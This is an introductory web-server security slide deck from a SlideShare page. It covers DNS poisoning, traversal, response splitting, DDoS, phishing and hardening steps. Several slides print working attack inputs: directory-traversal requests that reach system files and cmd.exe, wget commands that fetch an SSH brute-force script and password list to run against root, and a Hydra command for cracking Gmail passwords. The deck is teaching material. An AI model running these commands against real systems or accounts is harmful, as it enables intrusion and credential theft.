SlideShare a Scribd company logo
Introduction to Web-ServerSecurity
Jitendra Kumar Patel Monday, September 28, 2015
The StoryThe Story
Once upon a time, there lived a lady, Pinky, and she owned a website and had hired a
Security Consultant to protect her website from malicious attackers.
One fine day,around 2:00 AM in the morning, she wanted to check her website and
found that the website has been HACKED. She immediately called her security guy and
told about the website getting hacked.
The poor chap was leisurely enjoying his dinner, 2:00 AM, was stumbled. He jumped off
the bed to chair and verified that the website is intact with no harm.
He conveyed the same to Pinky but after all cleaning work like browser cookie cleaning,
deleting temp files and all other thing, pinky was still getting the hacked website. On the
other hand the Security Consultant was sure that the website has not been hacked.
The story ends here :)
Moral of The StoryMoral of The Story
The story in the previous slide suffers from an attack knows as Local DNS Cache
Poisoning Attack.
The attacker has poisoned the local DNS server of the lady and hence every time she is
requesting for the ip address of her website, she was getting the fake ip address of
hacked page.
On the other hand the Security Consultant was not attacked and hence he was able to
see the real website.
For more, please follow the discussion on slide no : 22
Agenda of the day ... ?
News
Terminology
Attacks
How to secure a web server ?
What to do Next ?
NEWS
The First major cyber attack on Apple's App Store has now
been linked to CIA (Central Intelligence Agency)
The OPM Data Breach (Office of Personnel Management) is
getting even worse than we thought.
Terminology
A complex system of interconnected elements.
Web... ?
The state of being free from danger or threat.
Security... ?
Web Security... ?
Web Security, also known as “Cyber security” involves protecting
information by preventing, detecting, and responding to attacks.
A server is simply a computer program software/hardware that dispenses web
responses as they are requested.
Server... ?
Types of Server... ?
Server Platform
Application Server
Audio/Video Server
Chat Server
Fax Server
Groupware Server
IRC Server
FTP Server
News Server
Proxy Server
Telnet Server
Virtual Servers
Web Server
List Server
Mail Server
Directory Server
Open Source Web Architecture... ?
Security
Why Web Servers Are Compromised... ?
Impact of Web-ServerAttacks... ?
Compromise of User Accounts
Data Tampering
Website Defacement
Secondary Attacks from the compromised website
Data Theft
Root Access to other Applications and Programs
Attacks
ServerMisconfiguration Attack...
The following default or incorrect configuration in the httpd.conf file on an
Apache server does not restrict access to the server-status page:
<Location /server-status>
SetHandler server-status
</Location>
This configuration allows the server status page to be viewed.
Example :
Directory traversal is an HTTP exploit which allows attackers to access restricted
directories and execute commands outside of the web server's root directory.
Directory Traversal Attack... ?
Web servers provide two main levels of security mechanisms
Access Control Lists (ACLs)
Root directory
GET http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1
Host: test.webarticles.com
Example :
GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
Host: test.webarticles.com
GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c: HTTP/1.1
Host: server.com
Man-In-The-Middle Attack... ?
A man-in-the-middle attack is one in which the attacker secretly intercepts and relays
messages between two parties who believe they are communicating directly with each
other.
HTTPResponse Splitting Attack... ?
In the HTTP Response Splitting attack, there are always 3 parties (at least) involved :
Web server - which has a security hole enabling HTTP Response Splitting
Target - an entity that interacts with the web server on behalf of the attacker.
Attacker - initiates the attack
Header splitting is an attack designed to steal data from users of a site. It can be used
to execute cross site scripting attacks, steal user data, or deface sites such that they
appear to contain content the creator did not intend.
<?php
header ("Location: " . $_GET['page']);
?>
http://icis.digitalparadox.org/~dcrab/redirect.php?page=http://www.digitalparadox.org
Example :
HTTPCache Poisoning Attacks... ?
HTTP Cache Poisoning is actually a very straight forward modification to HTTP splitting
and can be achieved by simply adding a header indicating that the version of the page
being returned was last modified sometime in the future, which will in turn trigger the
browser to cache said page.
In fact, setting the last modified header for the page to the future ensures subsequent
requests for that page will result in a 304 Not Modified header response form the server,
until such a time that the cache is outdated.
foobar
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 28 Sep 2016 14:50:18 GMT
Content-Length: 47
Hacker was here
Example :
DNS Hijacking ... ?
DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that
overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the
default DNS settings
A hacker or a malware program gains unauthorized access to your computer and changes the
DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and
maintained by the hacker.
Other dangers of DNS hijacking include the following attacks: Pharming
Phishing
DNS Amplification Attack... ?
A Domain Name Server (DNS) amplification attack is a popular form of distributed denial
of service (DDoS) that relies on the use of publically accessible open DNS servers to
overwhelm a victim system with DNS response traffic.
Impact
A misconfigured Domain Name System (DNS) server can be exploited to participate in a
distributed denial of service (DDoS) attack.
In March 2013, the method was used to target Spamhaus, likely by a purveyor of
malware whose business, the organization had disrupted by blacklisting. The
anonymity of the attack was such that Spamhaus is still unsure of the source.
Furthermore, the attack was so severe that it temporarily crippled and almost brought
down the Internet.
Top 10 Password Cracking Techniques... ?
1. Dictionary attack
2. Brute force attack
3. Rainbow table attack
4. Phishing
5. Social engineering
6. Malware
7. Offline cracking
8. Shoulder surfing
9. Spidering
10. Guess
SSHBrute Force Attack... ?
SSH is an acronym which stands for Secure SHell, which provides a secure shell
access to a remote machine.
wget http://zeldor.biz/other/bruteforce/passlist.txt
wget http://zeldor.biz/other/bruteforce/brutessh.zip
python brutessh.py -h 10.1.100.4 -u root -d passlist.txt
Web-ServerPassword Cracking Attacks... ?
A hacker can use variety of password Cracking Techniques such as Brute force,
Dictionary attacks and rainbow tables to crack weak administrator account passwords,
For Gmail Password cracking Syntax are like below :-
hydra -S -l <email> -P <passlist.txt> -e ns -V -s 465 smtp.gmail.com smtp
Example : THC - Hydra
DOS/DDOS Attack... ?
Renders websites and other online resources unavailable to intended users.
DoS threats come in many flavors, with some directly targeting the underlying server
infrastructure. Others exploit vulnerabilities in application and communication protocols.
A successful DoS attack is a highly noticeable event impacting the entire online user
base. This makes it a popular weapon of choice for hacktivists, cyber vandals,
extortionists and anyone else looking to make a point or champion a cause.
A website in France was hammered by a Distributed Denial of Service attack
that hit it at a rate from 325Gbps to 400Gbps making it the strongest DDoS
attack ever.
Phishing Attacks ... ?
Phishing is an e-mail fraud method in
which the perpetrator sends out legitimate-
looking email in an attempt to gather
personal and financial information from
recipients.
Typically, the messages appear to come
from well known and trustworthy Web
sites.
Web sites that are frequently spoofed by
phishers include PayPal, eBay, MSN,
Yahoo, BestBuy, and America Online.
Advance Phishing Attacks using HTML5 Fullscreen API... ?
Website Defacement... ?
The term "website defacement" refers to any unauthorized changes made to the
appearance of either a single webpage, or an entire site.
In some cases, a website is completely taken down and replaced by something new.
In other instances, a hacker may inject code in order to add images, popups, or text to a
page that were not previously present.
Massachusetts Institute of Technology website hacked by Indian HACKER
Sahoo hacked the website: http://web.stanford.edu/~mclindon/cgi-bin/
Indian Defence organisation DRDO website hacked
ISRO's Antrix Website Hacked
http://kerala.gov.in/Website Hacked
Attacks On Web Applications... ?
Securing a Web Server.... ?
01. Remove Unnecessary Services
02. Remote access
03. Separate development / testing / production environment
04. Web application content and server-side scripting
05. Permissions and privileges
06. Install all security patches on time
07. Monitor and audit the server
08. User accounts
09. Remove all unused modules and application extensions
10. Use security tools provided with web server software
11. Stay informed
12. Use Scanners
Whats Cooking Next... ?
Webserver Attack Methodology
Application Security Scanner
Mirroring a Website
Vulnerability Scanning
Tools Demo :
Web Password Cracking Tool : THC-Hydra and Brutus
Web Server Security Scanner : Wikto and Acunetix Web Vulnerability Scanner
Web Server Pen Testing Tool : CORE Impact® Pro
Web Application Security Scanner: Syhunt Dynamic and N-Stalker Web
Enumerating Webserver Information Using Nmap
References Page -1
http://sepiahost.com/assets/images/features/server-security-audit.png
http://thehackernews.com/
http://www.slideshare.net/bharaths7/web-security
http://www.naseerahmad.com/newBlog/wp-content/uploads/2010/01/ComputerTerminology.jpg
http://projects.webappsec.org/w/page/13246959/Server%20Misconfiguration
http://www.acunetix.com/websitesecurity/directory-traversal/
http://www.golemtechnologies.com/articles/http-response-splitting
http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
http://www.golemtechnologies.com/articles/http-response-splitting
http://link.springer.com/referenceworkentry/10.1007%2F978-1-4419-5906-5_666
http://deadlytechnology.com/web-development/http-attack/
http://www.hackguide4u.com/2010/10/dns-cache-poisoning-reviewed-tools.html
http://d2chgkz0kdtxdm.cloudfront.net/wp-content/uploads/2008/07/dns-poison.png
http://zeldor.biz/2011/01/how-to-bruteforce-ssh/
References Page-2
http://searchsecurity.techtarget.com/definition/man-in-the-middle-attack
https://www.multicert.com/fotos/editor2/men-in-the-middle-ingles.png
https://labs.ripe.net/Members/johannes_weber/RAAttackMITM.jpg
http://www.rafayhackingarticles.net/2011/02/web-server-hacking-techniques.html
http://www.alphr.com/features/371158/top-ten-password-cracking-techniques
https://www.incapsula.com/ddos/ddos-attacks/denial-of-service.html
http://www.zdnet.com/article/worst-ddos-attack-of-all-time-hits-french-site/
http://www.gohacking.com/dns-hijacking/
https://www.us-cert.gov/ncas/alerts/TA13-088A
http://whatis.techtarget.com/definition/DNS-amplification-attack
http://searchsecurity.techtarget.com/definition/phishing
http://www.websitepulse.com/blog/what-is-website-defacement
http://img01.ibnlive.in/ibnlive/uploads/2012/11/govt_drdo_hack.jpg
https://twitter.com/Atulmaharaj/status/620168881504518144/photo/1
http://www.hackersnewsbulletin.com/2014/08/massachusetts-institute-technology-website-hacked-indian-
hacker.html
https://www.eccouncil.org
http://www.itmonteur.net/wp-content/uploads/2012/09/Server_Security_Management.png
http://www.acunetix.com/websitesecurity/webserver-security/
Jitendra Kumar Patel
www.jitendrapatel.in
jitendra.patel@iiitb.org
@bewithjitendra
facebook.com/bewithjitendrapatel
Monday, September 28, 2015
Introduction to Web Server Security

More Related Content

What's hot

Web Security
Web SecurityWeb Security
Web Security
Bharath Manoharan
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
Umesh Mahawar
 
Web security
Web securityWeb security
Web security
Padam Banthia
 
Web security
Web securityWeb security
Web security
Jatin Grover
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
 
Detection of phishing websites
Detection of phishing websitesDetection of phishing websites
Detection of phishing websites
m srikanth
 
Cyber Security Awareness (Reduce Personal & Business Risk)
Cyber Security Awareness (Reduce Personal & Business Risk)Cyber Security Awareness (Reduce Personal & Business Risk)
Cyber Security Awareness (Reduce Personal & Business Risk)
Gian Gentile
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
Rohan Bharadwaj
 
Cybersecurity Awareness Training Presentation v1.0
Cybersecurity Awareness Training Presentation v1.0Cybersecurity Awareness Training Presentation v1.0
Cybersecurity Awareness Training Presentation v1.0
DallasHaselhorst
 
Firewall
FirewallFirewall
Firewall
Saurabh Chauhan
 
Impact to it security of incorrect configuration of firewall policies and thi...
Impact to it security of incorrect configuration of firewall policies and thi...Impact to it security of incorrect configuration of firewall policies and thi...
Impact to it security of incorrect configuration of firewall policies and thi...
usman butt
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack  PPT by Nitin BishtDDoS Attack  PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
Nitin Bisht
 
Brute force attack
Brute force attackBrute force attack
Brute force attackjoycruiser
 
Basic Security Training for End Users
Basic Security Training for End UsersBasic Security Training for End Users
Basic Security Training for End Users
Community IT Innovators
 
Introduction to cybercrime
Introduction to cybercrimeIntroduction to cybercrime
Introduction to cybercrime
patelripal99
 
Https presentation
Https presentationHttps presentation
Https presentation
patel jatin
 
encryption and decryption
encryption and decryptionencryption and decryption
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentation
TayabaZahid
 

What's hot (20)

Web Security
Web SecurityWeb Security
Web Security
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
 
Web security
Web securityWeb security
Web security
 
Web security
Web securityWeb security
Web security
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
Detection of phishing websites
Detection of phishing websitesDetection of phishing websites
Detection of phishing websites
 
Cyber Security Awareness (Reduce Personal & Business Risk)
Cyber Security Awareness (Reduce Personal & Business Risk)Cyber Security Awareness (Reduce Personal & Business Risk)
Cyber Security Awareness (Reduce Personal & Business Risk)
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
 
Cybersecurity Awareness Training Presentation v1.0
Cybersecurity Awareness Training Presentation v1.0Cybersecurity Awareness Training Presentation v1.0
Cybersecurity Awareness Training Presentation v1.0
 
Firewall
FirewallFirewall
Firewall
 
Impact to it security of incorrect configuration of firewall policies and thi...
Impact to it security of incorrect configuration of firewall policies and thi...Impact to it security of incorrect configuration of firewall policies and thi...
Impact to it security of incorrect configuration of firewall policies and thi...
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack  PPT by Nitin BishtDDoS Attack  PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
 
Brute force attack
Brute force attackBrute force attack
Brute force attack
 
Basic Security Training for End Users
Basic Security Training for End UsersBasic Security Training for End Users
Basic Security Training for End Users
 
Introduction to cybercrime
Introduction to cybercrimeIntroduction to cybercrime
Introduction to cybercrime
 
Https presentation
Https presentationHttps presentation
Https presentation
 
encryption and decryption
encryption and decryptionencryption and decryption
encryption and decryption
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentation
 
Web Servers (ppt)
Web Servers (ppt)Web Servers (ppt)
Web Servers (ppt)
 

Similar to Introduction to Web Server Security

Major Web Sever Threat.pptx
Major Web Sever Threat.pptxMajor Web Sever Threat.pptx
Major Web Sever Threat.pptx
SANDEEPVISHWAKARMA425010
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Joann Davis
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
Shivam Sahu
 
The most Common Website Security Threats
The most Common Website Security ThreatsThe most Common Website Security Threats
The most Common Website Security Threats
HTS Hosting
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
Cmano Kar
 
Types of Security Threats WordPress Websites Face - Part 2
Types of Security Threats WordPress Websites Face - Part 2Types of Security Threats WordPress Websites Face - Part 2
Types of Security Threats WordPress Websites Face - Part 2
WPWhiteBoard
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
Janagi Kannan
 
Website Security: A Guide to Defending Your Website
Website Security: A Guide to Defending Your WebsiteWebsite Security: A Guide to Defending Your Website
Website Security: A Guide to Defending Your Website
WebGuru Infosystems Pvt. Ltd.
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefox
Reza Nurfachmi
 
Information security
Information securityInformation security
Information security
Sathyanarayana Panduranga
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Latest Top 10 Types of Cyber Security Threats
Latest Top 10 Types of Cyber Security ThreatsLatest Top 10 Types of Cyber Security Threats
Latest Top 10 Types of Cyber Security Threats
B R SOFTECH PVT LTD
 
Recent cyber Attacks
Recent cyber AttacksRecent cyber Attacks
Recent cyber Attacks
S.M. Towhidul Islam
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
Aryashree Pritikrishna
 
You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
TechGenie
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Chris Hillman
 
Computer Security
Computer SecurityComputer Security
Computer Security
Vaibhavi Patel
 

Similar to Introduction to Web Server Security (20)

Major Web Sever Threat.pptx
Major Web Sever Threat.pptxMajor Web Sever Threat.pptx
Major Web Sever Threat.pptx
 
4.Xss
4.Xss4.Xss
4.Xss
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
 
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 AitpMitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
The most Common Website Security Threats
The most Common Website Security ThreatsThe most Common Website Security Threats
The most Common Website Security Threats
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
 
Types of Security Threats WordPress Websites Face - Part 2
Types of Security Threats WordPress Websites Face - Part 2Types of Security Threats WordPress Websites Face - Part 2
Types of Security Threats WordPress Websites Face - Part 2
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
Website Security: A Guide to Defending Your Website
Website Security: A Guide to Defending Your WebsiteWebsite Security: A Guide to Defending Your Website
Website Security: A Guide to Defending Your Website
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefox
 
Information security
Information securityInformation security
Information security
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Latest Top 10 Types of Cyber Security Threats
Latest Top 10 Types of Cyber Security ThreatsLatest Top 10 Types of Cyber Security Threats
Latest Top 10 Types of Cyber Security Threats
 
Recent cyber Attacks
Recent cyber AttacksRecent cyber Attacks
Recent cyber Attacks
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Computer Security
Computer SecurityComputer Security
Computer Security
 

More from JITENDRA KUMAR PATEL

Introduction-To-SMPC-Philips-Innovation-Campus-SecurityExploded
Introduction-To-SMPC-Philips-Innovation-Campus-SecurityExplodedIntroduction-To-SMPC-Philips-Innovation-Campus-SecurityExploded
Introduction-To-SMPC-Philips-Innovation-Campus-SecurityExploded
JITENDRA KUMAR PATEL
 
Improving-The-Round-Complexity-of-VSS-in-Point-To-Point-Networks
Improving-The-Round-Complexity-of-VSS-in-Point-To-Point-NetworksImproving-The-Round-Complexity-of-VSS-in-Point-To-Point-Networks
Improving-The-Round-Complexity-of-VSS-in-Point-To-Point-Networks
JITENDRA KUMAR PATEL
 
Glyph-Placement-Strategy
Glyph-Placement-StrategyGlyph-Placement-Strategy
Glyph-Placement-Strategy
JITENDRA KUMAR PATEL
 
Manufacturing Compromise The Emergence of Exploit-as-a-Service
Manufacturing Compromise The Emergence of Exploit-as-a-ServiceManufacturing Compromise The Emergence of Exploit-as-a-Service
Manufacturing Compromise The Emergence of Exploit-as-a-Service
JITENDRA KUMAR PATEL
 
Secure 2 Party AES
Secure 2 Party AESSecure 2 Party AES
Secure 2 Party AES
JITENDRA KUMAR PATEL
 
Introduction to node.js aka NodeJS
Introduction to node.js aka NodeJSIntroduction to node.js aka NodeJS
Introduction to node.js aka NodeJS
JITENDRA KUMAR PATEL
 
Docker meetup-jan-2015
Docker meetup-jan-2015Docker meetup-jan-2015
Docker meetup-jan-2015
JITENDRA KUMAR PATEL
 

More from JITENDRA KUMAR PATEL (7)

Introduction-To-SMPC-Philips-Innovation-Campus-SecurityExploded
Introduction-To-SMPC-Philips-Innovation-Campus-SecurityExplodedIntroduction-To-SMPC-Philips-Innovation-Campus-SecurityExploded
Introduction-To-SMPC-Philips-Innovation-Campus-SecurityExploded
 
Improving-The-Round-Complexity-of-VSS-in-Point-To-Point-Networks
Improving-The-Round-Complexity-of-VSS-in-Point-To-Point-NetworksImproving-The-Round-Complexity-of-VSS-in-Point-To-Point-Networks
Improving-The-Round-Complexity-of-VSS-in-Point-To-Point-Networks
 
Glyph-Placement-Strategy
Glyph-Placement-StrategyGlyph-Placement-Strategy
Glyph-Placement-Strategy
 
Manufacturing Compromise The Emergence of Exploit-as-a-Service
Manufacturing Compromise The Emergence of Exploit-as-a-ServiceManufacturing Compromise The Emergence of Exploit-as-a-Service
Manufacturing Compromise The Emergence of Exploit-as-a-Service
 
Secure 2 Party AES
Secure 2 Party AESSecure 2 Party AES
Secure 2 Party AES
 
Introduction to node.js aka NodeJS
Introduction to node.js aka NodeJSIntroduction to node.js aka NodeJS
Introduction to node.js aka NodeJS
 
Docker meetup-jan-2015
Docker meetup-jan-2015Docker meetup-jan-2015
Docker meetup-jan-2015
 

Recently uploaded

The geography of Taylor Swift - some ideas
The geography of Taylor Swift - some ideasThe geography of Taylor Swift - some ideas
The geography of Taylor Swift - some ideas
GeoBlogs
 
special B.ed 2nd year old paper_20240531.pdf
special B.ed 2nd year old paper_20240531.pdfspecial B.ed 2nd year old paper_20240531.pdf
special B.ed 2nd year old paper_20240531.pdf
Special education needs
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
siemaillard
 
Unit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdfUnit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdf
Thiyagu K
 
Language Across the Curriculm LAC B.Ed.
Language Across the  Curriculm LAC B.Ed.Language Across the  Curriculm LAC B.Ed.
Language Across the Curriculm LAC B.Ed.
Atul Kumar Singh
 
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdfUnit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Thiyagu K
 
TESDA TM1 REVIEWER FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...
TESDA TM1 REVIEWER  FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...TESDA TM1 REVIEWER  FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...
TESDA TM1 REVIEWER FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...
EugeneSaldivar
 
CACJapan - GROUP Presentation 1- Wk 4.pdf
CACJapan - GROUP Presentation 1- Wk 4.pdfCACJapan - GROUP Presentation 1- Wk 4.pdf
CACJapan - GROUP Presentation 1- Wk 4.pdf
camakaiclarkmusic
 
2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...
Sandy Millin
 
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
MysoreMuleSoftMeetup
 
Supporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptxSupporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptx
Jisc
 
The Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official PublicationThe Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official Publication
Delapenabediema
 
How to Make a Field invisible in Odoo 17
How to Make a Field invisible in Odoo 17How to Make a Field invisible in Odoo 17
How to Make a Field invisible in Odoo 17
Celine George
 
Overview on Edible Vaccine: Pros & Cons with Mechanism
Overview on Edible Vaccine: Pros & Cons with MechanismOverview on Edible Vaccine: Pros & Cons with Mechanism
Overview on Edible Vaccine: Pros & Cons with Mechanism
DeeptiGupta154
 
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCECLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
BhavyaRajput3
 
Polish students' mobility in the Czech Republic
Polish students' mobility in the Czech RepublicPolish students' mobility in the Czech Republic
Polish students' mobility in the Czech Republic
Anna Sz.
 
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXXPhrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
Phrasal Verbs.XXXXXXXXXXXXXXXXXXXXXXXXXX
MIRIAMSALINAS13
 
Operation Blue Star - Saka Neela Tara
Operation Blue Star   -  Saka Neela TaraOperation Blue Star   -  Saka Neela Tara
Operation Blue Star - Saka Neela Tara
Balvir Singh
 
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
Nguyen Thanh Tu Collection
 
Sha'Carri Richardson Presentation 202345
Sha'Carri Richardson Presentation 202345Sha'Carri Richardson Presentation 202345
Sha'Carri Richardson Presentation 202345
beazzy04
 

Recently uploaded (20)

The geography of Taylor Swift - some ideas
The geography of Taylor Swift - some ideasThe geography of Taylor Swift - some ideas
The geography of Taylor Swift - some ideas
 
special B.ed 2nd year old paper_20240531.pdf
special B.ed 2nd year old paper_20240531.pdfspecial B.ed 2nd year old paper_20240531.pdf
special B.ed 2nd year old paper_20240531.pdf
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
Unit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdfUnit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdf
 
Language Across the Curriculm LAC B.Ed.
Language Across the  Curriculm LAC B.Ed.Language Across the  Curriculm LAC B.Ed.
Language Across the Curriculm LAC B.Ed.
 
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdfUnit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdf
 
TESDA TM1 REVIEWER FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...
TESDA TM1 REVIEWER  FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...TESDA TM1 REVIEWER  FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...
TESDA TM1 REVIEWER FOR NATIONAL ASSESSMENT WRITTEN AND ORAL QUESTIONS WITH A...
 
CACJapan - GROUP Presentation 1- Wk 4.pdf
CACJapan - GROUP Presentation 1- Wk 4.pdfCACJapan - GROUP Presentation 1- Wk 4.pdf
CACJapan - GROUP Presentation 1- Wk 4.pdf
 
2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...
 
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
 
Supporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptxSupporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptx
 
The Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official PublicationThe Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official Publication
 
How to Make a Field invisible in Odoo 17
How to Make a Field invisible in Odoo 17How to Make a Field invisible in Odoo 17
How to Make a Field invisible in Odoo 17
 
Overview on Edible Vaccine: Pros & Cons with Mechanism
Overview on Edible Vaccine: Pros & Cons with MechanismOverview on Edible Vaccine: Pros & Cons with Mechanism
Overview on Edible Vaccine: Pros & Cons with Mechanism
 
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
